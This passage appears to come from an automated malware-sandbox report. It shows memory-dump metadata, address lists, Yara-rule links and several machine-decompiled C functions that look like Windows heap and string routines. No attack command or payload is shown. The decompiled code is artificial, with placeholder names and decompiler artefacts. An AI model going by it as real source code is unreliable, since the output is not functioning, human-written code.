                                                        0x048c4c5b
                                                        0x048c4c5c
                                                        0x048c4c63
                                                        0x048c4c6b
                                                        0x00000000
                                                        0x00000000
                                                        0x04906776
                                                        0x04906784
                                                        0x04906784
                                                        0x0490679f
                                                        0x049067a7
                                                        0x049067af
                                                        0x049067ce
                                                        0x00000000
                                                        0x049067b1
                                                        0x049067b7
                                                        0x049067b8
                                                        0x049067c1
                                                        0x049067d3
                                                        0x049067d9
                                                        0x049067dd
                                                        0x048c4c94
                                                        0x048c4c94
                                                        0x048c4c98
                                                        0x048c4c9c
                                                        0x048c4ca3
                                                        0x049067f4
                                                        0x049067f4
                                                        0x048c4cb5
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x048c4cb5
                                                        0x048c4c79
                                                        0x048c4c7e
                                                        0x048c4c89
                                                        0x048c4c8b
                                                        0x048c4c8f
                                                        0x048c4c8f
                                                        0x00000000
                                                        0x048c4c89
                                                        0x049067c3
                                                        0x00000000
                                                        0x049067c3
                                                        0x049067af
                                                        0x048c4c73
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e452d1aeb63afaf192f110e35008579f3956bb9da43523490b97da6474a3cc9d
                                                        • Instruction ID: 1658c2e763b014867dc990da6a6bb02c9b44632e5ad80da472049ab43224827b
                                                        • Opcode Fuzzy Hash: e452d1aeb63afaf192f110e35008579f3956bb9da43523490b97da6474a3cc9d
                                                        • Instruction Fuzzy Hash: EB41A935A002189FDB20DF68C940BE977B8EF45714F0146A9E908EB250D774FE84CB95
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048A8A0A, Relevance: .1, Instructions: 120COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 94%
                                                        			E048A8A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x498d360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E048DB640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E048AE9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x4871180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E048C1DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E048D3C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E048A8999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L048B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}



























                                                        0x048a8a0a
                                                        0x048a8a1c
                                                        0x048a8a23
                                                        0x048a8a2e
                                                        0x048a8a30
                                                        0x048a8a36
                                                        0x048a8a3c
                                                        0x048a8a3e
                                                        0x048a8a4a
                                                        0x048a8a52
                                                        0x048a8a9c
                                                        0x048a8aae
                                                        0x048a8a58
                                                        0x048a8a5e
                                                        0x048a8a6a
                                                        0x048a8a6f
                                                        0x048a8a75
                                                        0x048a8a7d
                                                        0x048a8a85
                                                        0x048a8a86
                                                        0x048a8a89
                                                        0x048a8a93
                                                        0x048a8a99
                                                        0x048a8a9b
                                                        0x00000000
                                                        0x048a8aaf
                                                        0x048a8abe
                                                        0x048a8ac3
                                                        0x048a8acb
                                                        0x048a8ad7
                                                        0x048a8ae0
                                                        0x048a8af1
                                                        0x00000000
                                                        0x048a8af1
                                                        0x048a8acd
                                                        0x048a8ad5
                                                        0x048a8afb
                                                        0x048a8afd
                                                        0x048a8aff
                                                        0x048a8b07
                                                        0x048a8b22
                                                        0x048a8b24
                                                        0x048a8b2a
                                                        0x048a8b2e
                                                        0x048a8b3f
                                                        0x048a8b78
                                                        0x048a8b41
                                                        0x048a8b52
                                                        0x048a8b54
                                                        0x048a8b5c
                                                        0x048a8b74
                                                        0x048a8b74
                                                        0x048a8b5c
                                                        0x048a8b3f
                                                        0x048a8b5e
                                                        0x048a8b61
                                                        0x048a8b64
                                                        0x048a8b64
                                                        0x048a8b6c
                                                        0x048a8b6c
                                                        0x048a8b11
                                                        0x048f9cd5
                                                        0x048f9cd5
                                                        0x048a8b17
                                                        0x048a8b1a
                                                        0x048a8b1a
                                                        0x00000000
                                                        0x048a8ad5
                                                        0x048a8a89

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 74031d52aa20f04f962b3dedbe21882cef912a1cd86d94c535ef23d52c74272b
                                                        • Instruction ID: 430948b0762987a6f081635e343f7f337bb304ff37c744db74bf8848b48595a0
                                                        • Opcode Fuzzy Hash: 74031d52aa20f04f962b3dedbe21882cef912a1cd86d94c535ef23d52c74272b
                                                        • Instruction Fuzzy Hash: BA4178B0A4122C9BEB24DF15CC88BA9B7F4EF44304F104AD9D919D7241E7B0AD95CF61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0495AA16, Relevance: .1, Instructions: 120COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E0495AA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				intOrPtr _v24;
				char* _t37;
				void* _t47;
				signed char _t51;
				void* _t53;
				char _t55;
				intOrPtr _t57;
				signed char _t61;
				intOrPtr _t75;
				void* _t76;
				signed int _t81;
				intOrPtr _t82;

				_t53 = __ecx;
				_t55 = 0;
				_v20 = _v20 & 0;
				_t75 = __edx;
				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
				_v24 = __edx;
				_v12 = 0;
				if((_t81 & 0x01000000) != 0) {
					L5:
					if(_a8 != 0) {
						_t81 = _t81 | 0x00000008;
					}
					_t57 = E0495ABF4(_t55 + _t75, _t81);
					_v8 = _t57;
					if(_t57 < _t75 || _t75 > 0x7fffffff) {
						_t76 = 0;
						_v16 = _v16 & 0;
					} else {
						_t59 = _t53;
						_t76 = E0495AB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
							_t47 = E0495AC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
							_t61 = _v20;
							if(_t61 != 0) {
								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
								if(E0493CB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
									L048B77F0(_t53, 0, _t76);
									_t76 = 0;
								}
							}
						}
					}
					_t82 = _v8;
					L16:
					if(E048B7D50() == 0) {
						_t37 = 0x7ffe0380;
					} else {
						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0495131B(_t53, _t76, _t82, _v16);
					}
					return _t76;
				}
				_t51 =  *(__ecx + 0x20);
				_v20 = _t51;
				if(_t51 == 0) {
					goto L5;
				}
				_t81 = _t81 | 0x00000008;
				if(E0493CB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
					_t55 = _v12;
					goto L5;
				} else {
					_t82 = 0;
					_t76 = 0;
					_v16 = _v16 & 0;
					goto L16;
				}
			}



















                                                        0x0495aa1f
                                                        0x0495aa21
                                                        0x0495aa23
                                                        0x0495aa2b
                                                        0x0495aa30
                                                        0x0495aa36
                                                        0x0495aa39
                                                        0x0495aa42
                                                        0x0495aa75
                                                        0x0495aa7a
                                                        0x0495aa7c
                                                        0x0495aa7c
                                                        0x0495aa88
                                                        0x0495aa8a
                                                        0x0495aa8f
                                                        0x0495ab02
                                                        0x0495ab04
                                                        0x0495aa99
                                                        0x0495aaa8
                                                        0x0495aaaf
                                                        0x0495aab3
                                                        0x0495aacc
                                                        0x0495aad1
                                                        0x0495aad6
                                                        0x0495aae0
                                                        0x0495aaf3
                                                        0x0495aaf9
                                                        0x0495aafe
                                                        0x0495aafe
                                                        0x0495aaf3
                                                        0x0495aad6
                                                        0x0495aab3
                                                        0x0495ab07
                                                        0x0495ab0a
                                                        0x0495ab11
                                                        0x0495ab23
                                                        0x0495ab13
                                                        0x0495ab1c
                                                        0x0495ab1c
                                                        0x0495ab2b
                                                        0x0495ab44
                                                        0x0495ab44
                                                        0x0495ab51
                                                        0x0495ab51
                                                        0x0495aa44
                                                        0x0495aa47
                                                        0x0495aa4c
                                                        0x00000000
                                                        0x00000000
                                                        0x0495aa5a
                                                        0x0495aa64
                                                        0x0495aa72
                                                        0x00000000
                                                        0x0495aa66
                                                        0x0495aa66
                                                        0x0495aa68
                                                        0x0495aa6a
                                                        0x00000000
                                                        0x0495aa6a

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                                        • Instruction ID: 1891b86b0a625f579ac35b5e76e3b727221de4ab7e2b26de22969f5c93d8ebda
                                                        • Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                                        • Instruction Fuzzy Hash: 29319132B006446FEB15DA69C845BAFF7ABEFC4310F258179AC05A7261DA74AD40C798
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0495FDE2, Relevance: .1, Instructions: 116COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 76%
                                                        			E0495FDE2(signed int* __ecx, signed int __edx, signed int _a4) {
				char _v8;
				signed int _v12;
				signed int _t29;
				char* _t32;
				char* _t43;
				signed int _t80;
				signed int* _t84;

				_push(__ecx);
				_push(__ecx);
				_t56 = __edx;
				_t84 = __ecx;
				_t80 = E0495FD4E(__ecx, __edx);
				_v12 = _t80;
				if(_t80 != 0) {
					_t29 =  *__ecx & _t80;
					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
						E04960A13(__ecx, _t80, 0, _a4);
						_t80 = 1;
						if(E048B7D50() == 0) {
							_t32 = 0x7ffe0380;
						} else {
							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							_push(3);
							L21:
							E04951608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
						}
						goto L22;
					}
					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
						_t80 = E04962B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
						if(_t80 != 0) {
							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
							_t77 = _v8;
							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
								E0495C8F7(_t66, _t77, 0);
							}
						}
					} else {
						_t80 = E0495DBD2(__ecx[0xb], _t74, __edx, _a4);
					}
					if(E048B7D50() == 0) {
						_t43 = 0x7ffe0380;
					} else {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
						goto L22;
					} else {
						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
						goto L21;
					}
				} else {
					_push(__ecx);
					_push(_t80);
					E0495A80D(__ecx[0xf], 9, __edx, _t80);
					L22:
					return _t80;
				}
			}










                                                        0x0495fde7
                                                        0x0495fde8
                                                        0x0495fdec
                                                        0x0495fdee
                                                        0x0495fdf5
                                                        0x0495fdf7
                                                        0x0495fdfc
                                                        0x0495fe19
                                                        0x0495fe22
                                                        0x0495fe26
                                                        0x0495fec6
                                                        0x0495fecd
                                                        0x0495fed5
                                                        0x0495fee7
                                                        0x0495fed7
                                                        0x0495fee0
                                                        0x0495fee0
                                                        0x0495feef
                                                        0x0495ff00
                                                        0x0495ff02
                                                        0x0495ff07
                                                        0x0495ff07
                                                        0x00000000
                                                        0x0495feef
                                                        0x0495fe33
                                                        0x0495fe55
                                                        0x0495fe59
                                                        0x0495fe5b
                                                        0x0495fe5e
                                                        0x0495fe69
                                                        0x0495fe6d
                                                        0x0495fe6d
                                                        0x0495fe69
                                                        0x0495fe35
                                                        0x0495fe41
                                                        0x0495fe41
                                                        0x0495fe79
                                                        0x0495fe8b
                                                        0x0495fe7b
                                                        0x0495fe84
                                                        0x0495fe84
                                                        0x0495fe93
                                                        0x00000000
                                                        0x0495fea8
                                                        0x0495feba
                                                        0x00000000
                                                        0x0495feba
                                                        0x0495fdfe
                                                        0x0495fe01
                                                        0x0495fe02
                                                        0x0495fe08
                                                        0x0495ff0c
                                                        0x0495ff14
                                                        0x0495ff14

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                        • Instruction ID: 6b60baa49d104c871397202e920454b58e1dce24d9833f33d9615c2fb40b72a1
                                                        • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                        • Instruction Fuzzy Hash: 7731E7323006406FD722DB68C848F6A77EEEBC5764F284579ED468B769DA74F841C710
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0495EA55, Relevance: .1, Instructions: 111COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 70%
                                                        			E0495EA55(intOrPtr* __ecx, char __edx, signed int _a4) {
				signed int _v8;
				char _v12;
				intOrPtr _v15;
				char _v16;
				intOrPtr _v19;
				void* _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t26;
				signed int _t27;
				char* _t40;
				unsigned int* _t50;
				intOrPtr* _t58;
				unsigned int _t59;
				char _t75;
				signed int _t86;
				intOrPtr _t88;
				intOrPtr* _t91;

				_t75 = __edx;
				_t91 = __ecx;
				_v12 = __edx;
				_t50 = __ecx + 0x30;
				_t86 = _a4 & 0x00000001;
				if(_t86 == 0) {
					E048B2280(_t26, _t50);
					_t75 = _v16;
				}
				_t58 = _t91;
				_t27 = E0495E815(_t58, _t75);
				_v8 = _t27;
				if(_t27 != 0) {
					E0489F900(_t91 + 0x34, _t27);
					if(_t86 == 0) {
						E048AFFB0(_t50, _t86, _t50);
					}
					_push( *((intOrPtr*)(_t91 + 4)));
					_push( *_t91);
					_t59 =  *(_v8 + 0x10);
					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
					_push(0x8000);
					_t11 = _t53 - 1; // 0x0
					_t12 = _t53 - 1; // 0x0
					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
					E0495AFDE( &_v12,  &_v16);
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					E0495BCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
					_t55 = _v36;
					_t88 = _v36;
					if(E048B7D50() == 0) {
						_t40 = 0x7ffe0388;
					} else {
						_t55 = _v19;
						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t40 != 0) {
						E0494FE3F(_t55, _t91, _v15, _t55);
					}
				} else {
					if(_t86 == 0) {
						E048AFFB0(_t50, _t86, _t50);
						_t75 = _v16;
					}
					_push(_t58);
					_t88 = 0;
					_push(0);
					E0495A80D(_t91, 8, _t75, 0);
				}
				return _t88;
			}






















                                                        0x0495ea55
                                                        0x0495ea66
                                                        0x0495ea68
                                                        0x0495ea6c
                                                        0x0495ea6f
                                                        0x0495ea72
                                                        0x0495ea75
                                                        0x0495ea7a
                                                        0x0495ea7a
                                                        0x0495ea7e
                                                        0x0495ea80
                                                        0x0495ea85
                                                        0x0495ea8b
                                                        0x0495eab5
                                                        0x0495eabc
                                                        0x0495eabf
                                                        0x0495eabf
                                                        0x0495eaca
                                                        0x0495eace
                                                        0x0495ead0
                                                        0x0495eae4
                                                        0x0495eaeb
                                                        0x0495eaf0
                                                        0x0495eaf5
                                                        0x0495eb09
                                                        0x0495eb0d
                                                        0x0495eb1d
                                                        0x0495eb2d
                                                        0x0495eb38
                                                        0x0495eb3d
                                                        0x0495eb41
                                                        0x0495eb4a
                                                        0x0495eb60
                                                        0x0495eb4c
                                                        0x0495eb52
                                                        0x0495eb59
                                                        0x0495eb59
                                                        0x0495eb68
                                                        0x0495eb71
                                                        0x0495eb71
                                                        0x0495ea8d
                                                        0x0495ea8f
                                                        0x0495ea92
                                                        0x0495ea97
                                                        0x0495ea97
                                                        0x0495ea9b
                                                        0x0495ea9c
                                                        0x0495ea9e
                                                        0x0495eaa6
                                                        0x0495eaa6
                                                        0x0495eb7e

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                        • Instruction ID: 0f218a8a090480c7cef17329c160da6b8c8e9a6466cb11dad832fb782b0b5061
                                                        • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                        • Instruction Fuzzy Hash: 5231B2326047059FDB19DF28C880A5BB7AAFBC0314F144A2DEA9687650DE31F905C7A5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 049169A6, Relevance: .1, Instructions: 108COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 69%
                                                        			E049169A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x498d360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L048A6C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E04916BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E048D9980() >= 0) {
							E048B2280(_t56, 0x4988778);
							_t77 = 1;
							_t68 = 1;
							if( *0x4988774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x4988774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E0489B6F0(0x487c338, 0x487c288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E048D9520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E048D95D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E048AFFB0(_t68, _t77, 0x4988778);
				}
				_pop(_t78);
				return E048DB640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}
































                                                        0x049169b5
                                                        0x049169be
                                                        0x049169c3
                                                        0x049169c9
                                                        0x049169cc
                                                        0x049169d1
                                                        0x049169d3
                                                        0x049169de
                                                        0x049169e1
                                                        0x049169ea
                                                        0x049169f6
                                                        0x049169fe
                                                        0x04916a13
                                                        0x04916a14
                                                        0x04916a15
                                                        0x04916a16
                                                        0x04916a1e
                                                        0x04916a26
                                                        0x04916a31
                                                        0x04916a36
                                                        0x04916a37
                                                        0x04916a40
                                                        0x04916a49
                                                        0x04916a4a
                                                        0x04916a53
                                                        0x04916a59
                                                        0x04916a5d
                                                        0x04916a5e
                                                        0x04916a64
                                                        0x04916a67
                                                        0x04916a6a
                                                        0x04916a6d
                                                        0x04916a70
                                                        0x04916a77
                                                        0x04916a7d
                                                        0x04916a86
                                                        0x04916a89
                                                        0x04916a9c
                                                        0x04916a9f
                                                        0x04916aa2
                                                        0x04916aa5
                                                        0x04916aaf
                                                        0x04916ab1
                                                        0x04916ab8
                                                        0x04916ab9
                                                        0x04916abb
                                                        0x04916abe
                                                        0x04916ac5
                                                        0x04916ac5
                                                        0x04916aaf
                                                        0x04916a40
                                                        0x04916a26
                                                        0x049169fe
                                                        0x04916ace
                                                        0x04916ad0
                                                        0x04916ad3
                                                        0x04916ad8
                                                        0x04916adf
                                                        0x04916adf
                                                        0x04916ae8
                                                        0x04916aef
                                                        0x04916aef
                                                        0x04916af9
                                                        0x04916b06

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f6add32c1ca131216a042d9c34958877373eec54d34dc7a925df14b336f9b287
                                                        • Instruction ID: bf4ac179f37f7abd55b890ea67286941f19d01aec49a6d8d943992c993a5620a
                                                        • Opcode Fuzzy Hash: f6add32c1ca131216a042d9c34958877373eec54d34dc7a925df14b336f9b287
                                                        • Instruction Fuzzy Hash: 98417FB1D0120C9FEB14DFA9D940BEEBBF8EF48714F04862AE914E7250DB74A905CB51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04895210, Relevance: .1, Instructions: 107COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 85%
                                                        			E04895210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E048952A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E048D95D0();
							L048B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E048AEB70(_t54, 0x49879a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E048D95D0();
								L048B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E048AEB70(_t54, 0x49879a0);
						}
						return _t52;
					}
					L5:
					_t33 = E048DF3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E048AEB70(_t54, 0x49879a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E048D95D0();
							L048B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}














                                                        0x04895220
                                                        0x04895224
                                                        0x048f0d13
                                                        0x048f0d16
                                                        0x048f0d19
                                                        0x0489522a
                                                        0x0489522a
                                                        0x0489522d
                                                        0x0489522d
                                                        0x04895231
                                                        0x04895235
                                                        0x04895239
                                                        0x048f0d5c
                                                        0x048f0d62
                                                        0x00000000
                                                        0x00000000
                                                        0x048f0d6a
                                                        0x048f0d7b
                                                        0x048f0d7f
                                                        0x048f0d81
                                                        0x048f0d84
                                                        0x048f0d95
                                                        0x048f0d95
                                                        0x048f0d6c
                                                        0x048f0d71
                                                        0x048f0d71
                                                        0x048f0d9a
                                                        0x00000000
                                                        0x0489524a
                                                        0x0489524a
                                                        0x04895250
                                                        0x048f0d24
                                                        0x048f0d35
                                                        0x048f0d39
                                                        0x048f0d3b
                                                        0x048f0d3e
                                                        0x048f0d50
                                                        0x048f0d50
                                                        0x048f0d26
                                                        0x048f0d2b
                                                        0x048f0d2b
                                                        0x00000000
                                                        0x048f0d55
                                                        0x04895256
                                                        0x0489525b
                                                        0x04895265
                                                        0x048f0da7
                                                        0x0489526b
                                                        0x0489526e
                                                        0x04895272
                                                        0x048f0db1
                                                        0x048f0db4
                                                        0x048f0dc5
                                                        0x048f0dc5
                                                        0x04895272
                                                        0x04895278
                                                        0x0489527e
                                                        0x0489528a
                                                        0x0489528c
                                                        0x0489528d
                                                        0x00000000
                                                        0x04895280
                                                        0x04895282
                                                        0x04895288
                                                        0x0489529f
                                                        0x04895292
                                                        0x00000000
